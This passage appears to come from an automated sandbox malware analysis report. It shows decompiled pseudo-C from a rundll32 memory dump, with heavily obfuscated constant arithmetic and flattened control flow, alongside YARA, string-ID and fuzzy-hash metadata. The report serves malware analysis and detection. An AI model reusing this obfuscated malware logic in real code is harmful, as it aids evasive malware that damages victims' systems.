                                                                      				signed int _v1152;
                                                                      				signed int _v1156;
                                                                      				void* _t297;
                                                                      				void* _t300;
                                                                      				signed int _t310;
                                                                      				signed int _t311;
                                                                      				signed int _t312;
                                                                      				signed int _t313;
                                                                      				signed int _t314;
                                                                      				signed int _t315;
                                                                      				void* _t348;
                                                                      				signed int* _t352;
                                                                      
                                                                      				_t352 =  &_v1156;
                                                                      				_v1048 = 0xd4c9;
                                                                      				_v1048 = _v1048 * 0x4c;
                                                                      				_t348 = 0x16977827;
                                                                      				_v1048 = _v1048 ^ 0x003f2fc5;
                                                                      				_v1152 = 0x1223;
                                                                      				_v1152 = _v1152 + 0xffffe86f;
                                                                      				_v1152 = _v1152 << 0xe;
                                                                      				_v1152 = _v1152 + 0xffffc4b4;
                                                                      				_v1152 = _v1152 ^ 0xfea449db;
                                                                      				_v1140 = 0xd009;
                                                                      				_v1140 = _v1140 << 0xf;
                                                                      				_v1140 = _v1140 | 0x34d7ffad;
                                                                      				_t310 = 0x67;
                                                                      				_v1140 = _v1140 * 0x78;
                                                                      				_v1140 = _v1140 ^ 0x853faa5e;
                                                                      				_v1108 = 0xfb19;
                                                                      				_v1108 = _v1108 / _t310;
                                                                      				_v1108 = _v1108 | 0xfc9c85cc;
                                                                      				_v1108 = _v1108 + 0xffff75b2;
                                                                      				_v1108 = _v1108 ^ 0xfc9bca28;
                                                                      				_v1096 = 0x8988;
                                                                      				_v1096 = _v1096 >> 0xf;
                                                                      				_v1096 = _v1096 >> 2;
                                                                      				_v1096 = _v1096 ^ 0xb058b54e;
                                                                      				_v1096 = _v1096 ^ 0xb058a14a;
                                                                      				_v1092 = 0x4bf5;
                                                                      				_v1092 = _v1092 ^ 0x3fcc7587;
                                                                      				_v1092 = _v1092 + 0xffff7c60;
                                                                      				_v1092 = _v1092 ^ 0x3fcbd886;
                                                                      				_v1124 = 0x90b1;
                                                                      				_v1124 = _v1124 | 0x0315067d;
                                                                      				_v1124 = _v1124 << 0xf;
                                                                      				_v1124 = _v1124 >> 0xd;
                                                                      				_v1124 = _v1124 ^ 0x00061076;
                                                                      				_v1100 = 0x6642;
                                                                      				_v1100 = _v1100 + 0x2c45;
                                                                      				_v1100 = _v1100 + 0xffffed6b;
                                                                      				_v1100 = _v1100 + 0xc076;
                                                                      				_v1100 = _v1100 ^ 0x000143f3;
                                                                      				_v1132 = 0xeff1;
                                                                      				_t311 = 0x75;
                                                                      				_v1132 = _v1132 / _t311;
                                                                      				_v1132 = _v1132 >> 4;
                                                                      				_t312 = 0x1b;
                                                                      				_v1132 = _v1132 * 0x22;
                                                                      				_v1132 = _v1132 ^ 0x00007806;
                                                                      				_v1064 = 0x9d13;
                                                                      				_v1064 = _v1064 + 0xffff9636;
                                                                      				_v1064 = _v1064 ^ 0x00006af4;
                                                                      				_v1116 = 0xe2d7;
                                                                      				_v1116 = _v1116 / _t312;
                                                                      				_v1116 = _v1116 >> 0xf;
                                                                      				_v1116 = _v1116 << 2;
                                                                      				_v1116 = _v1116 ^ 0x00007ff5;
                                                                      				_v1080 = 0xca15;
                                                                      				_v1080 = _v1080 << 8;
                                                                      				_t313 = 0x44;
                                                                      				_v1080 = _v1080 / _t313;
                                                                      				_v1080 = _v1080 ^ 0x0002d41f;
                                                                      				_v1148 = 0x482;
                                                                      				_v1148 = _v1148 | 0x6f5ddb7d;
                                                                      				_v1148 = _v1148 >> 7;
                                                                      				_v1148 = _v1148 ^ 0x00de8355;
                                                                      				_v1072 = 0xb874;
                                                                      				_t314 = 0x5f;
                                                                      				_v1072 = _v1072 / _t314;
                                                                      				_v1072 = _v1072 ^ 0x00004463;
                                                                      				_v1056 = 0xaefc;
                                                                      				_v1056 = _v1056 | 0xd38cb8c2;
                                                                      				_v1056 = _v1056 ^ 0xd38ca246;
                                                                      				_v1144 = 0x8c63;
                                                                      				_t315 = 0x7c;
                                                                      				_v1144 = _v1144 / _t315;
                                                                      				_v1144 = _v1144 >> 9;
                                                                      				_v1144 = _v1144 << 7;
                                                                      				_v1144 = _v1144 ^ 0x00001598;
                                                                      				_v1084 = 0x1bb3;
                                                                      				_v1084 = _v1084 | 0xfc2ca821;
                                                                      				_v1084 = _v1084 * 0x7a;
                                                                      				_v1084 = _v1084 ^ 0x2d512892;
                                                                      				_v1088 = 0x616c;
                                                                      				_v1088 = _v1088 + 0xffff5892;
                                                                      				_v1088 = _v1088 ^ 0x224cc7f0;
                                                                      				_v1088 = _v1088 ^ 0xddb37e9b;
                                                                      				_v1136 = 0x8caf;
                                                                      				_v1136 = _v1136 >> 0xb;
                                                                      				_v1136 = _v1136 >> 1;
                                                                      				_v1136 = _v1136 * 0x1f;
                                                                      				_v1136 = _v1136 ^ 0x00000e7d;
                                                                      				_v1076 = 0xc9f6;
                                                                      				_v1076 = _v1076 << 9;
                                                                      				_v1076 = _v1076 >> 0xc;
                                                                      				_v1076 = _v1076 ^ 0x0000608f;
                                                                      				_v1068 = 0x998d;
                                                                      				_v1068 = _v1068 ^ 0xf04ba484;
                                                                      				_v1068 = _v1068 ^ 0xf04b529f;
                                                                      				_v1128 = 0x17ad;
                                                                      				_v1128 = _v1128 ^ 0xb750fecf;
                                                                      				_v1128 = _v1128 ^ 0x37dc0b1b;
                                                                      				_v1128 = _v1128 * 0x74;
                                                                      				_v1128 = _v1128 ^ 0x3fd6ce0a;
                                                                      				_v1044 = 0x27ee;
                                                                      				_v1044 = _v1044 << 0xf;
                                                                      				_v1044 = _v1044 ^ 0x13f7204f;
                                                                      				_v1112 = 0xf1d1;
                                                                      				_v1112 = _v1112 << 0x10;
                                                                      				_v1112 = _v1112 >> 0xc;
                                                                      				_v1112 = _v1112 + 0xffff75c7;
                                                                      				_v1112 = _v1112 ^ 0x000ef6df;
                                                                      				_v1060 = 0x618f;
                                                                      				_v1060 = _v1060 + 0xffff6fb8;
                                                                      				_v1060 = _v1060 ^ 0xffffc83e;
                                                                      				_v1120 = 0x72ef;
                                                                      				_v1120 = _v1120 >> 0xe;
                                                                      				_v1120 = _v1120 + 0xffff6b18;
                                                                      				_v1120 = _v1120 << 2;
                                                                      				_v1120 = _v1120 ^ 0xfffdf85c;
                                                                      				_v1052 = 0xbded;
                                                                      				_v1052 = _v1052 | 0xda406fe1;
                                                                      				_v1052 = _v1052 ^ 0xda40c173;
                                                                      				_v1156 = 0xd36a;
                                                                      				_v1156 = _v1156 << 0xd;
                                                                      				_v1156 = _v1156 << 0xa;
                                                                      				_v1156 = _v1156 << 5;
                                                                      				_v1156 = _v1156 ^ 0xa000634b;
                                                                      				_v1104 = 0x4b7d;
                                                                      				_v1104 = _v1104 + 0xffff7f0e;
                                                                      				_v1104 = _v1104 << 6;
                                                                      				_v1104 = _v1104 ^ 0x67f3b216;
                                                                      				_v1104 = _v1104 ^ 0x98012c8f;
                                                                      				_t297 = E02001999();
                                                                      				do {
                                                                      					while(_t348 != 0x16977827) {
                                                                      						if(_t348 == 0x1a33a432) {
                                                                      							return E0200CBE7( &_v520, _v1052, __eflags, _v1156, _v1104,  &_v1040);
                                                                      						}
                                                                      						if(_t348 == 0x25c7bc2a) {
                                                                      							_push(0x1ff1348);
                                                                      							_push(_v1088);
                                                                      							_push(_v1084);
                                                                      							_t300 = E01FF5DFC(_v1056, _v1144, __eflags);
                                                                      							E0200BAEC(0x104, __eflags, _v1068, _t300,  *0x2011088 + 0x38, _v1128, _v1044,  &_v1040, E01FFA156(),  *0x2011088 + 0x254);
                                                                      							_t297 = E02000D6D(_v1112, _v1060, _v1120, _t300);
                                                                      							_t352 =  &(_t352[0xd]);
                                                                      							_t348 = 0x1a33a432;
                                                                      							continue;
                                                                      						}
                                                                      						_t358 = _t348 - 0x33badc0c;
                                                                      						if(_t348 != 0x33badc0c) {
                                                                      							goto L8;
                                                                      						}
                                                                      						_push(0x1ff12d8);
                                                                      						_push(_v1092);
                                                                      						_push(_v1096);
                                                                      						E01FFA4D7(_t358, _v1100, _v1132, _v1064, _v1116, E01FF5DFC(_v1140, _v1108, _t358),  *0x2011088 + 0x254,  &_v520,  *0x2011088 + 0x38);
                                                                      						_t297 = E02000D6D(_v1080, _v1148, _v1072, _t306);
                                                                      						_t352 =  &(_t352[0xd]);
                                                                      						_t348 = 0x25c7bc2a;
                                                                      					}
                                                                      					_t348 = 0x33badc0c;
                                                                      					L8:
                                                                      					__eflags = _t348 - 0x27e22baf;
                                                                      				} while (__eflags != 0);
                                                                      				return _t297;
                                                                      			}













































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E,$Kc$cD$la$}K$'$r
                                                                      • API String ID: 0-4173883944
                                                                      • Opcode ID: de0748037eeefac12261f3013889c7af2949dee63a99769dd2319c64226db495
                                                                      • Instruction ID: 6ca84cc8613357bb12aaf18af0f276ed593c0aada827cdb8b34c8e420797a2d2
                                                                      • Opcode Fuzzy Hash: de0748037eeefac12261f3013889c7af2949dee63a99769dd2319c64226db495
                                                                      • Instruction Fuzzy Hash: B6D100715097819FE368CF25C58995FFBF1BBC4748F008A1DF2A9962A0D7B58909CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: E,$Kc$cD$la$}K$'$r
                                                                      • API String ID: 0-4173883944
                                                                      • Opcode ID: 6a175492a499137ea374cfe269ddd9e9c8d4711c6dbcf778b749c7f062f43257
                                                                      • Instruction ID: 6ab440a76e5e7ada8caa49b4ede37e914cd20e3b612231a5966a8f830ba1d653
                                                                      • Opcode Fuzzy Hash: 6a175492a499137ea374cfe269ddd9e9c8d4711c6dbcf778b749c7f062f43257
                                                                      • Instruction Fuzzy Hash: 35D122B14093819FE368CF21C98994BFBF1BBC5748F108A1DF1A9962A0D7B58919CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 91%
                                                                      			E020093AA(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32) {
                                                                      				intOrPtr _v60;
                                                                      				char _v68;
                                                                      				char _v72;
                                                                      				signed int _v76;
                                                                      				signed int _v80;
                                                                      				signed int _v84;
                                                                      				signed int _v88;
                                                                      				signed int _v92;
                                                                      				signed int _v96;
                                                                      				signed int _v100;
                                                                      				signed int _v104;
                                                                      				signed int _v108;
                                                                      				signed int _v112;
                                                                      				signed int _v116;
                                                                      				signed int _v120;
                                                                      				signed int _v124;
                                                                      				signed int _v128;
                                                                      				signed int _v132;
                                                                      				signed int _v136;
                                                                      				signed int _v140;
                                                                      				signed int _v144;
                                                                      				signed int _v148;
                                                                      				signed int _v152;
                                                                      				signed int _v156;
                                                                      				signed int _v160;
                                                                      				signed int _v164;
                                                                      				signed int _v168;
                                                                      				signed int _v172;
                                                                      				signed int _v176;
                                                                      				char _t248;
                                                                      				void* _t268;
                                                                      				signed int _t277;
                                                                      				signed int _t278;
                                                                      				signed int _t279;
                                                                      				signed int _t280;
                                                                      				void* _t283;
                                                                      				void* _t306;
                                                                      				intOrPtr _t307;
                                                                      				signed int* _t310;
                                                                      
                                                                      				_push(_a32);
                                                                      				_t306 = __edx;
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(0);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				_t248 = E02002550(0);
                                                                      				_v72 = _t248;
                                                                      				_t307 = _t248;
                                                                      				_v148 = 0x29e1;
                                                                      				_t310 =  &(( &_v176)[0xa]);
                                                                      				_v148 = _v148 >> 9;
                                                                      				_t283 = 0x2cc51d90;
                                                                      				_v148 = _v148 * 0x6f;
                                                                      				_v148 = _v148 | 0x583ef178;
                                                                      				_v148 = _v148 ^ 0x583efdfc;
                                                                      				_v164 = 0x7cea;
                                                                      				_v164 = _v164 | 0x4429ef4c;
                                                                      				_v164 = _v164 + 0xf89e;
                                                                      				_v164 = _v164 + 0xffff234a;
                                                                      				_v164 = _v164 ^ 0x442a1bf6;
                                                                      				_v92 = 0x551c;
                                                                      				_v92 = _v92 | 0xd302566e;
                                                                      				_v92 = _v92 ^ 0xd3022a7a;
                                                                      				_v144 = 0x6ba7;
                                                                      				_v144 = _v144 << 4;
                                                                      				_v144 = _v144 + 0xffffb9a2;
                                                                      				_v144 = _v144 + 0x5888;
                                                                      				_v144 = _v144 ^ 0x0006e6af;
                                                                      				_v112 = 0x922a;
                                                                      				_v112 = _v112 + 0xffff887d;
                                                                      				_v112 = _v112 | 0x4fd748bd;
                                                                      				_v112 = _v112 ^ 0x4fd73150;
                                                                      				_v96 = 0xfb64;
                                                                      				_v96 = _v96 ^ 0x5db48c82;
                                                                      				_v96 = _v96 ^ 0x5db438bb;
                                                                      				_v80 = 0xb20f;
                                                                      				_v80 = _v80 >> 2;
                                                                      				_v80 = _v80 ^ 0x0000552e;
                                                                      				_v172 = 0x50a7;
                                                                      				_v172 = _v172 + 0xf2d5;
                                                                      				_v172 = _v172 + 0x271f;
                                                                      				_v172 = _v172 << 2;
                                                                      				_v172 = _v172 ^ 0x0005de3e;
                                                                      				_v100 = 0xadaf;
                                                                      				_v100 = _v100 * 0x16;
                                                                      				_v100 = _v100 ^ 0x000ed173;
                                                                      				_v116 = 0xf129;
                                                                      				_v116 = _v116 << 0x10;
                                                                      				_v116 = _v116 * 0x16;
                                                                      				_v116 = _v116 ^ 0xb986550c;
                                                                      				_v104 = 0x5183;
                                                                      				_v104 = _v104 << 0x10;
                                                                      				_v104 = _v104 + 0xffff5d8d;
                                                                      				_v104 = _v104 ^ 0x51824a7c;
                                                                      				_v88 = 0x760e;
                                                                      				_v88 = _v88 + 0x327e;
                                                                      				_v88 = _v88 ^ 0x000099bb;
                                                                      				_v108 = 0xe303;
                                                                      				_v108 = _v108 | 0x0bc04f3b;
                                                                      				_v108 = _v108 ^ 0xb2f83cb4;
                                                                      				_v108 = _v108 ^ 0xb938c20e;
                                                                      				_v168 = 0xcb46;
                                                                      				_v168 = _v168 | 0x1c191218;
                                                                      				_v168 = _v168 ^ 0xd77ae4dd;
                                                                      				_v168 = _v168 * 3;
                                                                      				_v168 = _v168 ^ 0x6229d687;
                                                                      				_v128 = 0x9759;
                                                                      				_v128 = _v128 + 0x8621;
                                                                      				_t277 = 0xf;
                                                                      				_v128 = _v128 / _t277;
                                                                      				_v128 = _v128 ^ 0x00007121;
                                                                      				_v76 = 0xd82;
                                                                      				_t278 = 0x2a;
                                                                      				_v76 = _v76 * 0xe;
                                                                      				_v76 = _v76 ^ 0x0000cd5d;
                                                                      				_v132 = 0x21c9;
                                                                      				_v132 = _v132 * 0x5a;
                                                                      				_v132 = _v132 ^ 0x66c8732e;
                                                                      				_v132 = _v132 ^ 0x66c3ddac;
                                                                      				_v176 = 0x796f;
                                                                      				_v176 = _v176 << 9;
                                                                      				_v176 = _v176 + 0x7729;
                                                                      				_v176 = _v176 ^ 0xc241325b;
                                                                      				_v176 = _v176 ^ 0xc2b2798d;
                                                                      				_v140 = 0xd764;
                                                                      				_v140 = _v140 >> 0xa;
                                                                      				_v140 = _v140 | 0x53b98b23;
                                                                      				_v140 = _v140 ^ 0x53b9a9a1;
                                                                      				_v156 = 0xc431;
                                                                      				_v156 = _v156 * 0x4f;
                                                                      				_v156 = _v156 / _t278;
                                                                      				_t279 = 0x11;
                                                                      				_v156 = _v156 * 0x67;
                                                                      				_v156 = _v156 ^ 0x00942fb3;
                                                                      				_v124 = 0x3cc2;
                                                                      				_v124 = _v124 * 9;
                                                                      				_v124 = _v124 ^ 0x606055d7;
                                                                      				_v124 = _v124 ^ 0x60627716;
                                                                      				_v120 = 0xfe38;
                                                                      				_v120 = _v120 ^ 0x435657c1;
                                                                      				_v120 = _v120 + 0x12e6;
                                                                      				_v120 = _v120 ^ 0x4356a6ba;
                                                                      				_v152 = 0x32f6;
                                                                      				_v152 = _v152 | 0x1093d085;
                                                                      				_v152 = _v152 / _t279;
                                                                      				_v152 = _v152 << 4;
                                                                      				_v152 = _v152 ^ 0x0f9a6d0a;
                                                                      				_v160 = 0x4b19;
                                                                      				_t280 = 0x77;
                                                                      				_v160 = _v160 / _t280;
                                                                      				_v160 = _v160 ^ 0xf7099762;
                                                                      				_v160 = _v160 | 0x01d0dbaa;
                                                                      				_v160 = _v160 ^ 0xf7d9b5b4;
                                                                      				_v84 = 0x47d5;
                                                                      				_v84 = _v84 << 5;
                                                                      				_v84 = _v84 ^ 0x0008a7be;
                                                                      				_v136 = 0xe6c7;
                                                                      				_v136 = _v136 >> 3;
                                                                      				_v136 = _v136 | 0xf3ae5db4;
                                                                      				_v136 = _v136 ^ 0xf3ae7fe8;
                                                                      				do {
                                                                      					while(_t283 != 0x1257245d) {
                                                                      						if(_t283 == 0x1752ae50) {
                                                                      							_push(_t283);
                                                                      							_t268 = E0200BB38(_a8, _v92, _v144, _v112, _v96,  &_v72);
                                                                      							_t310 =  &(_t310[5]);
                                                                      							__eflags = _t268;
                                                                      							if(_t268 != 0) {
                                                                      								_t283 = 0x2f6ec6e3;
                                                                      								continue;
                                                                      							}
                                                                      						} else {
                                                                      							if(_t283 == 0x2cc51d90) {
                                                                      								_t283 = 0x1752ae50;
                                                                      								continue;
                                                                      							} else {
                                                                      								_t317 = _t283 - 0x2f6ec6e3;
                                                                      								if(_t283 != 0x2f6ec6e3) {
                                                                      									goto L10;
                                                                      								} else {
                                                                      									E01FF5755(_v80,  &_v68, _v172, _v100, 0x44);
                                                                      									_v68 = 0x44;
                                                                      									_v60 = E01FF5DFC(_v116, _v104, _t317);
                                                                      									_t307 = E02000566(_a32, _t306, _a8, _v168, _v128, 0, _v76, _v72, _v132, _v176, _v164 | _v148, _v140, _v156,  &_v68, _v124, _v88, _v108, 0x1ff13b0);
                                                                      									E02000D6D(_v120, _v152, _v160, _v60);
                                                                      									_t310 =  &(_t310[5]) - 0xc + 0x4c;
                                                                      									_t283 = 0x1257245d;
                                                                      									continue;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      						goto L11;
                                                                      					}
                                                                      					E0200506F(_v84, _v136, _v72);
                                                                      					_t283 = 0x5a97d8c;
                                                                      					L10:
                                                                      					__eflags = _t283 - 0x5a97d8c;
                                                                      				} while (_t283 != 0x5a97d8c);
                                                                      				L11:
                                                                      				return _t307;
                                                                      			}










































                                                                      0x02009774
                                                                      0x0200984a
                                                                      0x00000000
                                                                      0x0200977a
                                                                      0x0200977a
                                                                      0x0200977c
                                                                      0x00000000
                                                                      0x02009782
                                                                      0x02009797
                                                                      0x020097a5
                                                                      0x020097c4
                                                                      0x02009827
                                                                      0x02009838
                                                                      0x0200983d
                                                                      0x02009840
                                                                      0x00000000
                                                                      0x02009840
                                                                      0x0200977c
                                                                      0x02009774
                                                                      0x00000000
                                                                      0x02009768
                                                                      0x0200988d
                                                                      0x02009893
                                                                      0x02009898
                                                                      0x02009898
                                                                      0x02009898
                                                                      0x020098a5
                                                                      0x020098b0

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !q$)w$.U$D$L)D$~2$)
                                                                      • API String ID: 0-595699237
                                                                      • Opcode ID: 511870ddf36565991de80c0fc29378eccdbe5134a7f8a86759dc73472c26fcd7
                                                                      • Instruction ID: 4c23e10e6bd76d8c013de504288cc458172c18ca5d54c6ba5fd7ece8a55dd4cb
                                                                      • Opcode Fuzzy Hash: 511870ddf36565991de80c0fc29378eccdbe5134a7f8a86759dc73472c26fcd7
                                                                      • Instruction Fuzzy Hash: B6C1F0715083809FE369CF65D48961FFBE2BBC5748F10891DF19A962A0D3B68A49CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !q$)w$.U$D$L)D$~2$)
                                                                      • API String ID: 0-595699237
                                                                      • Opcode ID: 7256cd9149fbbca799cb3615b561e9a7d920d3c9d6f0bc85317b2e9bdd81c148
                                                                      • Instruction ID: 1635e3d5262046a140a1c05afb35ce1a349f747b3394c0ee092cea8b56dc1b34
                                                                      • Opcode Fuzzy Hash: 7256cd9149fbbca799cb3615b561e9a7d920d3c9d6f0bc85317b2e9bdd81c148
                                                                      • Instruction Fuzzy Hash: C9C10F715183809FE368CF65C58A61FFBE1BBC4348F10891DF2A6962A0D7B58A59CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 93%
                                                                      			E01FF5F04() {
                                                                      				char _v524;
                                                                      				intOrPtr _v548;
                                                                      				char _v564;
                                                                      				void* _v576;
                                                                      				intOrPtr _v580;
                                                                      				signed int _v584;
                                                                      				char _v588;
                                                                      				signed int _v592;
                                                                      				signed int _v596;
                                                                      				signed int _v600;
                                                                      				signed int _v604;
                                                                      				signed int _v608;
                                                                      				signed int _v612;
                                                                      				signed int _v616;
                                                                      				signed int _v620;
                                                                      				signed int _v624;
                                                                      				signed int _v628;
                                                                      				signed int _v632;
                                                                      				signed int _v636;
                                                                      				signed int _v640;
                                                                      				signed int _v644;
                                                                      				signed int _v648;
                                                                      				signed int _v652;
                                                                      				signed int _v656;
                                                                      				signed int _v660;
                                                                      				signed int _v664;
                                                                      				signed int _v668;
                                                                      				signed int _v672;
                                                                      				signed int _v676;
                                                                      				signed int _t227;
                                                                      				void* _t230;
                                                                      				signed int _t231;
                                                                      				void* _t233;
                                                                      				signed int _t238;
                                                                      				void* _t239;
                                                                      				signed int _t241;
                                                                      				signed int _t242;
                                                                      				signed int _t243;
                                                                      				signed int _t244;
                                                                      				signed int _t245;
                                                                      				signed int _t246;
                                                                      				signed int _t261;
                                                                      				void* _t265;
                                                                      				void* _t267;
                                                                      				signed int* _t272;
                                                                      
                                                                      				_t272 =  &_v676;
                                                                      				_v580 = 0x338be2;
                                                                      				asm("stosd");
                                                                      				_t239 = 0;
                                                                      				_t241 = 0x39;
                                                                      				asm("stosd");
                                                                      				_t265 = 0x41161d4;
                                                                      				asm("stosd");
                                                                      				_v620 = 0xc71e;
                                                                      				_v620 = _v620 * 0x1e;
                                                                      				_v620 = _v620 >> 5;
                                                                      				_v620 = _v620 ^ 0x0000ba2c;
                                                                      				_v648 = 0x4ad;
                                                                      				_v648 = _v648 / _t241;
                                                                      				_v648 = _v648 >> 0xe;
                                                                      				_v648 = _v648 >> 0xe;
                                                                      				_v648 = _v648 ^ 0x00000001;
                                                                      				_v660 = 0xb98c;
                                                                      				_v660 = _v660 | 0xef7bff5f;
                                                                      				_v660 = _v660 ^ 0xef7ba8e4;
                                                                      				_v632 = 0x5e63;
                                                                      				_v632 = _v632 | 0xe7359418;
                                                                      				_v632 = _v632 + 0x2517;
                                                                      				_v632 = _v632 ^ 0xe7367cd6;
                                                                      				_v596 = 0x2929;
                                                                      				_v596 = _v596 + 0x43ca;
                                                                      				_v596 = _v596 ^ 0x000063d5;
                                                                      				_v664 = 0x7cfb;
                                                                      				_v664 = _v664 ^ 0xff809b0f;
                                                                      				_v664 = _v664 + 0x2cd1;
                                                                      				_v664 = _v664 + 0x7a24;
                                                                      				_v664 = _v664 ^ 0xff81c2ff;
                                                                      				_v592 = 0xae03;
                                                                      				_t242 = 9;
                                                                      				_v592 = _v592 / _t242;
                                                                      				_v592 = _v592 ^ 0x0000766d;
                                                                      				_v608 = 0x3b9d;
                                                                      				_v608 = _v608 | 0x6b9c2f64;
                                                                      				_v608 = _v608 ^ 0x6b9c4a2d;
                                                                      				_v656 = 0xaf4c;
                                                                      				_v656 = _v656 << 2;
                                                                      				_v656 = _v656 + 0xc291;
                                                                      				_v656 = _v656 + 0x928e;
                                                                      				_v656 = _v656 ^ 0x0004749a;
                                                                      				_v604 = 0xbdeb;
                                                                      				_v604 = _v604 | 0xec45ef56;
                                                                      				_v604 = _v604 ^ 0xec45acc1;
                                                                      				_v644 = 0x8038;
                                                                      				_v644 = _v644 ^ 0x1255fbe8;
                                                                      				_t243 = 0x4b;
                                                                      				_v644 = _v644 / _t243;
                                                                      				_v644 = _v644 * 0x17;
                                                                      				_v644 = _v644 ^ 0x059f4be8;
                                                                      				_v652 = 0x8226;
                                                                      				_v652 = _v652 << 1;
                                                                      				_v652 = _v652 + 0xffffb0cc;
                                                                      				_v652 = _v652 + 0xffff366a;
                                                                      				_v652 = _v652 ^ 0xffff9d86;
                                                                      				_v640 = 0x94c8;
                                                                      				_v640 = _v640 >> 3;
                                                                      				_v640 = _v640 | 0xd3d89bc1;
                                                                      				_v640 = _v640 ^ 0xd3d8bf09;
                                                                      				_v600 = 0x2497;
                                                                      				_v600 = _v600 >> 5;
                                                                      				_v600 = _v600 ^ 0x00002681;
                                                                      				_v616 = 0xf8c0;
                                                                      				_v616 = _v616 + 0xffffe75c;
                                                                      				_v616 = _v616 >> 5;
                                                                      				_v616 = _v616 ^ 0x00007175;
                                                                      				_v624 = 0x8160;
                                                                      				_t244 = 0x37;
                                                                      				_v624 = _v624 / _t244;
                                                                      				_v624 = _v624 + 0xffff3ee5;
                                                                      				_v624 = _v624 ^ 0xffff1b58;
                                                                      				_v636 = 0xef93;
                                                                      				_v636 = _v636 | 0x0110f965;
                                                                      				_t245 = 0x18;
                                                                      				_v636 = _v636 * 0x45;
                                                                      				_v636 = _v636 ^ 0x4994db44;
                                                                      				_v612 = 0xb7f9;
                                                                      				_v612 = _v612 | 0xd5831ca8;
                                                                      				_v612 = _v612 ^ 0xd583ba2a;
                                                                      				_v668 = 0xb9bd;
                                                                      				_v668 = _v668 >> 0xb;
                                                                      				_v668 = _v668 + 0xf462;
                                                                      				_v668 = _v668 + 0xb834;
                                                                      				_v668 = _v668 ^ 0x0001a073;
                                                                      				_v676 = 0xaaae;
                                                                      				_t264 = _v612;
                                                                      				_v676 = _v676 / _t245;
                                                                      				_t227 = _v676;
                                                                      				_t246 = 0x6e;
                                                                      				_t261 = _t227 % _t246;
                                                                      				_v676 = _t227 / _t246;
                                                                      				_v676 = _v676 + 0xffff2536;
                                                                      				_v676 = _v676 ^ 0xffff3866;
                                                                      				_v628 = 0x8f9e;
                                                                      				_v628 = _v628 * 3;
                                                                      				_v628 = _v628 >> 5;
                                                                      				_v628 = _v628 ^ 0x00000ef3;
                                                                      				_v672 = 0x182c;
                                                                      				_v672 = _v672 + 0xffff84fe;
                                                                      				_v672 = _v672 + 0xd7a3;
                                                                      				_v672 = _v672 | 0x6c762e0a;
                                                                      				_v672 = _v672 ^ 0x6c767ecc;
                                                                      				do {
                                                                      					while(_t265 != 0x5e31a3) {
                                                                      						if(_t265 == 0x41161d4) {
                                                                      							_t265 = 0xacc4a3c;
                                                                      							continue;
                                                                      						} else {
                                                                      							if(_t265 == 0x7641b8a) {
                                                                      								_t231 = E02007A31(_v644,  &_v564, _t246, _v652, _t264, _v640, _t246, _v600);
                                                                      								asm("sbb esi, esi");
                                                                      								_t261 = _v624;
                                                                      								_t246 = _v616;
                                                                      								_t265 = ( ~_t231 & 0x1bdf7361) + 0x8e8e3cb;
                                                                      								E01FFF1ED(_t246, _t261, _v636, _v612, _t264);
                                                                      								_t272 =  &(_t272[9]);
                                                                      								goto L19;
                                                                      							} else {
                                                                      								if(_t265 == 0xacc4a3c) {
                                                                      									_push(_t246);
                                                                      									_t261 =  &_v524;
                                                                      									_t246 = _v660;
                                                                      									_t233 = E01FFDFD8(_t246, _t261, __eflags, _v632, _v596);
                                                                      									_t272 =  &(_t272[3]);
                                                                      									__eflags = _t233;
                                                                      									if(__eflags != 0) {
                                                                      										_t265 = 0x2aa4bbbd;
                                                                      										continue;
                                                                      									}
                                                                      								} else {
                                                                      									if(_t265 == 0x24c8572c) {
                                                                      										_t261 = _v676;
                                                                      										E02004291(_v668, _t261,  &_v588, _v628);
                                                                      										_pop(_t246);
                                                                      										_t265 = 0x5e31a3;
                                                                      										continue;
                                                                      									} else {
                                                                      										if(_t265 != 0x2aa4bbbd) {
                                                                      											goto L19;
                                                                      										} else {
                                                                      											_push(_t246);
                                                                      											_t261 = _v620;
                                                                      											_t246 = _v648;
                                                                      											_t238 = E0200C0C8(_t246, _t261, _v664,  &_v524, _v592, _v608, 0, _v656, _t246, _v672, _v604);
                                                                      											_t264 = _t238;
